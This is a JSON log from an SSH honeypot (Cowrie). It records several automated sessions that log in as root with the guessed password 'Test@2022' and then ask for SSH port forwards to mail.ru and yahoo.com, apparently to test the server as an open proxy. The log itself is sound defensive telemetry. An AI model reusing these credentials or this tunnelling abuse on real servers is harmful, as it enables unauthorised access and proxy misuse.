{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.230747Z","src_ip":"77.83.207.83","session":"396143c57d91"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.273094Z","src_ip":"77.83.207.83","session":"396143c57d91"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.535181Z","src_ip":"77.83.207.83","session":"396143c57d91"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25281,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25281","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.588457Z","session":"396143c57d91"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.641011Z","src_ip":"77.83.207.83","session":"396143c57d91"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":17497,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17497","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.787005Z","session":"396143c57d91"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.839682Z","src_ip":"77.83.207.83","session":"396143c57d91"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":1167,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:1167","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.986885Z","session":"396143c57d91"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.039794Z","src_ip":"77.83.207.83","session":"396143c57d91"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.093224Z","src_ip":"77.83.207.83","session":"396143c57d91"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":42519,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2900bcc0cef","protocol":"ssh","message":"New connection: 77.83.207.83:42519 (1.2.3.4:22) [session: f2900bcc0cef]","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.142158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.143123Z","src_ip":"77.83.207.83","session":"f2900bcc0cef"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.194277Z","src_ip":"77.83.207.83","session":"f2900bcc0cef"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.444646Z","src_ip":"77.83.207.83","session":"f2900bcc0cef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8140,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:8140","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.495705Z","session":"f2900bcc0cef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.546096Z","src_ip":"77.83.207.83","session":"f2900bcc0cef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":30112,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:30112","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.688573Z","session":"f2900bcc0cef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.738882Z","src_ip":"77.83.207.83","session":"f2900bcc0cef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":125,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:125","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.880464Z","session":"f2900bcc0cef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.930648Z","src_ip":"77.83.207.83","session":"f2900bcc0cef"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:20.981816Z","src_ip":"77.83.207.83","session":"f2900bcc0cef"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43061,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dda04aeb580","protocol":"ssh","message":"New connection: 77.83.207.83:43061 (1.2.3.4:22) [session: 3dda04aeb580]","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.031226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.031981Z","src_ip":"77.83.207.83","session":"3dda04aeb580"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.082621Z","src_ip":"77.83.207.83","session":"3dda04aeb580"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.333930Z","src_ip":"77.83.207.83","session":"3dda04aeb580"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":16519,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:16519","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.385183Z","session":"3dda04aeb580"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.435606Z","src_ip":"77.83.207.83","session":"3dda04aeb580"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":6571,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6571","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.576927Z","session":"3dda04aeb580"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.627566Z","src_ip":"77.83.207.83","session":"3dda04aeb580"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":10132,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:10132","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.768776Z","session":"3dda04aeb580"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.819188Z","src_ip":"77.83.207.83","session":"3dda04aeb580"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.870443Z","src_ip":"77.83.207.83","session":"3dda04aeb580"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43154,"dst_ip":"1.2.3.4","dst_port":22,"session":"58b0c28e6649","protocol":"ssh","message":"New connection: 77.83.207.83:43154 (1.2.3.4:22) [session: 58b0c28e6649]","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.920106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.921043Z","src_ip":"77.83.207.83","session":"58b0c28e6649"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:21.971603Z","src_ip":"77.83.207.83","session":"58b0c28e6649"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:22.222010Z","src_ip":"77.83.207.83","session":"58b0c28e6649"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24130,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:24130","sensor":"my-vps","timestamp":"2025-08-31T03:53:22.273098Z","session":"58b0c28e6649"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:22.323484Z","src_ip":"77.83.207.83","session":"58b0c28e6649"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":17480,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:17480","sensor":"my-vps","timestamp":"2025-08-31T03:53:22.464850Z","session":"58b0c28e6649"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:22.515460Z","src_ip":"77.83.207.83","session":"58b0c28e6649"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":15351,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:15351","sensor":"my-vps","timestamp":"2025-08-31T03:53:22.656682Z","session":"58b0c28e6649"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:22.707576Z","src_ip":"77.83.207.83","session":"58b0c28e6649"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:22.758958Z","src_ip":"77.83.207.83","session":"58b0c28e6649"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43236,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c340bd78193","protocol":"ssh","message":"New connection: 77.83.207.83:43236 (1.2.3.4:22) [session: 5c340bd78193]","sensor":"my-vps","timestamp":"2025-08-31T03:53:22.808283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:22.809063Z","src_ip":"77.83.207.83","session":"5c340bd78193"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:22.859838Z","src_ip":"77.83.207.83","session":"5c340bd78193"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:23.111796Z","src_ip":"77.83.207.83","session":"5c340bd78193"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15115,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15115","sensor":"my-vps","timestamp":"2025-08-31T03:53:23.163097Z","session":"5c340bd78193"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:23.214431Z","src_ip":"77.83.207.83","session":"5c340bd78193"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3219,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:3219","sensor":"my-vps","timestamp":"2025-08-31T03:53:23.356698Z","session":"5c340bd78193"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:23.407182Z","src_ip":"77.83.207.83","session":"5c340bd78193"}
